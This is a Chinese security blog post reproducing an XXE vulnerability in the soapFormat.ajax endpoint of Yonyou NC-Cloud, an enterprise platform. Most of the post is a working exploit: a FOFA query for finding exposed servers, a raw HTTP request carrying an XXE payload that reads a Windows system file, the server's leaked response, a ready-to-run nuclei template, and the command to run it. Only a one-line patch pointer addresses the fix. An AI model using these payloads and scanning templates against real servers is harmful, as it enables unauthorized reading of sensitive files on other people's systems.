【漏洞复现】用友NC-Cloud soapFormat XXE漏洞

最新推荐文章于 2024-08-05 19:20:27 发布
最新推荐文章于 2024-08-05 19:20:27 发布
阅读量708 收藏 6
点赞数 10
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71285176/article/details/135546309
版权

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

一、漏洞名称

用友NC-Cloud soapFormat XXE漏洞

二、漏洞影响

用友NC-Cloud

三、漏洞描述

用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。

四、FOFA搜索语句

FOFA语句:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"

五、漏洞复现

向靶场发送如下数据包,查看靶场的C://windows/win.ini文件

POST /uapws/soapFormat.ajax HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Content-Length: 263Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0

响应内容如下:

HTTP/1.1 200 OKConnection: closeContent-Length: 481Date: Thu, 28 Dec 2023 03:36:30 GMTServer: Apache-Coyote/1.1<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini" >]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1CMCDLLNAME32=mapi32.dllCMC=1MAPIX=1MAPIXVER=1.0.0.1OLEMessaging=1</faultcode></soap:Fault></soap:Body></soap:Envelope>

复现成功

六、POC

POC如下:

id: yonyou-nc-cloud-soapFormat-xxeinfo:name: 用友NC-Cloud soapFormat XXE漏洞author: fgzseverity: criticaldescription: 用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。metadata:max-request: 1fofa-query: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"verified: truerequests:- raw:- |+POST /uapws/soapFormat.ajax HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 259msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0amatchers:- type: dsldsl:- "status_code == 200 && contains(body, 'for 16-bit app')"

运行POC:

nuclei.exe-tmypoc/用友/nc-cloud/yonyou-nc-cloud-soapFormat-xxe.yaml-uhttp://xxx.xxx..xxx.xxx

七、修复建议

用友安全中心已经发布补丁,请及时修复。

https://security.yonyou.com/#/home

hacker?
关注
漏洞复现用友NC Cloud nc.bs.sm.login2.RegisterServlet接口存在SQL注入
失心少年
03-31 107
漏洞链接:http://127.0.0.1/servlet/~uap/nc.bs.sm.login2.RegisterServlet?技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!用友NC Cloud nc.bs.sm.login2.RegisterServlet接口存在SQL注入漏洞
用友U8 Cloud soapFormat XXE漏洞复现
0xSec
12-27 845
用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
漏洞复现--用友NC Cloud XXE
qq_53003652的博客
12-27 1334
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品soapFormat和IUpdateService存在XXE漏洞,可导致文件读取和RCE。
漏洞复现用友NC Cloud系统queryPsnInfo接口SQL注入
最新发布
今天是几号的博客
08-05 995
在受影响的版本中,攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
漏洞情报-x友NC-Cloud soapFor mat XXE漏洞
qq_52612931的博客
01-11 737
用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。用友NC Cloud
用友NC Cloud soapFormat.ajax接口存在XXE漏洞
weixin_62352348的博客
01-13 534
用友NC Cloud soapFormat.ajax接口存在XXE漏洞
漏洞复现用友NC Cloud-runScript-SQL注入漏洞_用友 nc cloud runscript sql注入漏洞复现
2401_84972830的博客
05-13 410
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
用友U8 Cloud XChangeServlet XXE漏洞复现
0xSec
04-30 576
用友U8 Cloud XChangeServlet接口处存在XXE漏洞,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
用友 NC IUpdateService XXE漏洞复现
0xSec
01-06 1411
用友 NC IUpdateService接口存在XML实体注入漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,读取系统内部文件,使系统处于极不安全状态。
用友NC Cloud soapFormat.ajax接口XXE漏洞复现 [附POC]
薛定谔嘚喵博客
01-08 610
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。用友NC Cloud soapFormat.ajax接口XXE漏洞
用友NC Cloud soapFormat.ajax接口存在XXE 附POC软件
nnn2188185的博客
12-26 470
用友NC Cloud soapFormat.ajax接口存在XXE 附POC软件
漏洞复现--用友NC-Cloud全版本任意文件上传/RCE
qq_53003652的博客
10-19 2360
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品最近爆出了全版本的一个文件上传/RCE,攻击者可利用此漏洞直接获得服务器权限。这里不知道为什么404,但c0nf1g.jsp上传成功了,后续操作正常。2.POST访问c0nf1g.jsp构造RCE。联系厂家发布更新补丁。
用友NCNC Cloud MxServlet反序列化漏洞复现
0xSec
11-15 2335
用友NCNC Cloud系统存在反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行了反序列化操作,结合系统本身存在的反序列化利用链,可造成了命令执行,深入利用可随意操作服务器。
用友NC Cloud存在前台远程命令执行漏洞 附POC软件
nnn2188185的博客
07-24 803
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
用友-NC-Cloud远程代码执行漏洞(你懂的)
weixin_43689708的博客
07-22 1661
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。
漏洞复现用友U8 Cloud——XXE
LongL_GuYu的博客
07-13 790
用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。其smartweb2.showRPCLoadingTip.d接口处存在XML实体,攻击者可通过该漏洞获取敏感文件信息。
用友 GRP-U8 Proxy XXE-SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
10-09 3555
用友GRP-U8 Proxy 存在SQL注入漏洞,攻击者可通过该漏洞获取服务器权限,详情点击了解更多。
用友NC NCCLOUD CNVD高危漏洞修复补丁
QB2767846279
11-13 4071
打补丁顺序 漏洞名称 问题描述 版本 1 NC&NCC 2020-09-10安全补丁合集 反序列化、远程命令执行等通用补丁方案 NC6X/NCC 2 NC6X安全补丁集 6X版本补丁集,解决一些通用漏洞 NC63/NC65 3 NCC1909,1903,2005安全必打补丁合集 NCC版本补丁集,解决一些通用漏洞 NCC1909/NCC1903/NCC2005 4 BSH远程代码执行漏洞 B
XXE漏洞详解(三)——XXE漏洞实际运用
永远是少年
12-23 802
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE漏洞详解(三)——XXE漏洞实际运用。 一、XXE漏洞简介 二、XXE漏洞pikachu靶场介绍 三、XXE漏洞pikachu靶场实战 (一)利用XXE漏洞读取文件 (二)利用XXE漏洞进行内网探测
用友GRP-U8高校内控管理软件 漏洞
07-28
引用\[1\]: 用友GRP-U8R10行政事业财务管理软件存在任意文件上传漏洞,攻击者可以通过该漏洞获取服务器权限。\[1\]该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。\[3\]因此,用友GRP-U8高校内控管理软件也可能存在类似的漏洞。请及时更新软件版本或采取其他安全措施以防止潜在的攻击。 #### 引用[.reference_title] - *1* [用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用](https://blog.csdn.net/qq_41904294/article/details/129693405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值